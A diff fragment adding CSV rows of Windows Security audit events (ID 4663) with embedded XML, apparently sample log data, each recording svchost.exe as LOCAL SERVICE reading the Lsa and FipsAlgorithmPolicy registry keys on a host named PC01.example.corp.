+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452875</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452874</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452873</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452872</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452871</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452870</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452869</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452868</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452867</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452866</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452865</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452864</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452862</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452861</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452860</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452859</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
